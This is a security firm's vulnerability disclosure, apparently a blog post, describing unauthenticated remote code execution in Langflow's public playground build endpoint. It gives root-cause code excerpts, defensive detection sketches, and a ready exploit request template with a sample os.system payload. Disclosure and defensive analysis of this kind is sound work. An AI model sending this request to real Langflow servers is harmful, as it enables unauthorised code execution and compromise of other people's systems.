February 10, 2026

depthfirst Finds Unauthenticated RCE in Langflow





Unauthenticated RCE in Langflow

Langflow is an open source visual interface for building AI workflows, with 145,000 GitHub stars. It’s brilliant and powerful, and until recently it contained a critical security flaw. depthfirst’s General Security Intelligence (GSI) found a critical vulnerability in Langflow’s public flow processing system that allows a remote unauthenticated attacker to execute arbitrary code.

How depthfirst Flagged the Vulnerability

To a standard security scanner, Langflow is a nightmare of false positives. Langflow’s core feature is executing (authenticated) user-supplied code, so flagging every eval() instance produces unhelpful noise.
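To make the noise problem concrete, here is a minimal sketch of a pattern-based check, assuming a scanner that flags every direct eval() or exec() call. The sample source and function names are invented for illustration and are not taken from Langflow or from any real scanner.

```python
import ast

# Hypothetical application code: both calls are flagged, although the first
# one is the product's intended (authenticated) feature.
SOURCE = '''
def run_user_component(code):
    # Intended feature: authenticated users run their own code.
    return eval(code)

def render_expression(expr):
    return eval(expr)
'''


def flag_dynamic_exec(source: str) -> list[tuple[int, str]]:
    """Return (line, name) for every direct call to eval() or exec()."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in {"eval", "exec"}
        ):
            findings.append((node.lineno, node.func.id))
    return sorted(findings)


findings = flag_dynamic_exec(SOURCE)
for line, name in findings:
    print(f"line {line}: call to {name}()")
```

A check like this says nothing about who can reach each call, which is the question that matters here.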

depthfirst GSI traced the unauthenticated execution paths and found that the build_public_tmp API can be forced to pass unauthenticated, user-supplied data into the graph execution engine. Here’s a screenshot of the finding in the depthfirst system:

Setting Up Langflow Safely (Soon to Be Exploited)



To create a proof of concept of the vulnerability, I installed Langflow with default options and created the simplest workflow I could imagine: chat input = chat output.

I then locked this flow so it can’t be modified (signified by the red lock in the bottom right corner) and turned on “Shareable Playground” so other authenticated users can “chat” with this workflow.

Logging in as another user, you can enjoy the very agreeable conversation experience:

Vulnerability Root Cause

Langflow “flows” are graphs: a set of nodes (components) and edges (connections). The “Shareable Playground” feature makes a flow public so authenticated users can run it. Under the hood, the public playground calls a special unauthenticated endpoint intended to build the stored flow graph.

The issue is that this public endpoint also accepts a full graph payload from the client, and if it’s present, the backend uses the client’s graph instead of the saved flow. That lets an unauthenticated attacker submit a malicious graph containing a custom component with embedded Python code. During graph construction, Langflow evaluates that code, leading directly to server‑side code execution.

In summary: a public endpoint that should run a stored flow instead trusts attacker‑supplied graph data.

Here’s the execution path in the code:

1. The public build endpoint forwards client‑provided data into the build pipeline:

    # src/backend/base/langflow/api/v1/chat.py
    @router.post("/build_public_tmp/{flow_id}/flow")
    async def build_public_tmp(..., data: FlowDataRequest | None = None, ...):
        owner_user, new_flow_id = await verify_public_flow_and_get_user(...)
        job_id = await start_flow_build(
            flow_id=new_flow_id,
            inputs=inputs,
            data=data,  # attacker‑supplied graph
            current_user=owner_user,
            ...
        )

2. When data exists, the backend builds the graph from that request (not from the internal database):

    # src/backend/base/langflow/api/build.py
    async def create_graph(...):
        if not data:
            return await build_graph_from_db(...)
        return await build_graph_from_data(payload=data.model_dump(), ...)

3. Custom components execute embedded Python code during instantiation:

    # src/backend/base/langflow/interface/initialize/loading.py
    code = custom_params.pop("code")
    class_object = eval_custom_component_code(code)
    custom_component = class_object(...)
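Step 3 is where data becomes execution. The sketch below is a toy stand-in for that kind of loader, not Langflow's eval_custom_component_code. The name load_component_class and its extra_globals parameter are assumptions made for illustration. It shows that turning source text into a class runs every top-level statement in that text, before any method of the class is called.

```python
def load_component_class(code: str, class_name: str = "Component", extra_globals=None):
    """Toy loader: execute source text and return the class it defines."""
    namespace = dict(extra_globals or {})
    exec(code, namespace)  # every top-level statement in `code` runs right here
    return namespace[class_name]


# Harmless stand-in for attacker-controlled component source.
untrusted_code = '''
EVENTS.append("ran at load time")  # executes during exec(), not during build()

class Component:
    def build(self):
        return "hello"
'''

events = []
component_class = load_component_class(untrusted_code, extra_globals={"EVENTS": events})

# The side effect has already happened, although build() was never called.
print(events)
```

Here the side effect is an entry in a list. In an attack it can be any Python statement.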

Exploit

The exploit uses the public playground build endpoint to submit a malicious flow graph. That graph includes a custom component whose embedded, attacker-controlled Python code runs on the server.



For my exploit payload, I decided to replace the frontend’s index.html with the text “hacked ya ;) ✌🏻” for demonstration purposes.

The core of the exploit is making the following HTTP request:

    POST /api/v1/build_public_tmp/<any flow_id>/flow
    Cookie: client_id=<any uuid>
    Content-Type: application/json

    Body: { "data": {
      "nodes": [{
        "template": {
          "code": {
            "value": <RCE payload>,
            ...
          }, ...
        }, ...
      }], ...
    }}

Where:

- <any flow_id> is the id of any shared flow

- <any uuid> is any UUID; I use 11111111-2222-3333-4444-555555555555

- <RCE payload> is the Python code to execute, for example:

    import os; os.system("touch /tmp/rce")
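For defenders, the same request shape suggests a simple check on request logs or at a proxy. The following is a minimal sketch, assuming the raw JSON body of a call to the public build endpoint is available. The function names are hypothetical, and the search is deliberately generic (any "template" object containing a "code" entry with a string "value") because the request above elides the full nesting.

```python
import json
from typing import Any, Iterator


def iter_code_values(obj: Any) -> Iterator[str]:
    """Yield every template -> code -> value string found anywhere in obj."""
    if isinstance(obj, dict):
        template = obj.get("template")
        if isinstance(template, dict):
            code = template.get("code")
            if isinstance(code, dict) and isinstance(code.get("value"), str):
                yield code["value"]
        for value in obj.values():
            yield from iter_code_values(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from iter_code_values(item)


def inspect_public_build_body(raw_body: str) -> dict:
    """Report whether a public build request carries its own graph and code."""
    body = json.loads(raw_body) if raw_body.strip() else {}
    data = body.get("data") if isinstance(body, dict) else None
    return {
        "client_graph_present": bool(data),
        "embedded_code": list(iter_code_values(data)),
    }


# Placeholder body mirroring the schematic request; the code value is inert text.
sample_body = json.dumps(
    {"data": {"nodes": [{"template": {"code": {"value": "import os"}}}]}}
)
report = inspect_public_build_body(sample_body)
empty_report = inspect_public_build_body("")
```

A request to the public endpoint that sets client_graph_present is worth reviewing regardless of what the embedded code says, since legitimate playground traffic is meant to run the stored flow.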

Running the PoC on a remote Langflow instance yields:

Here's the full video:
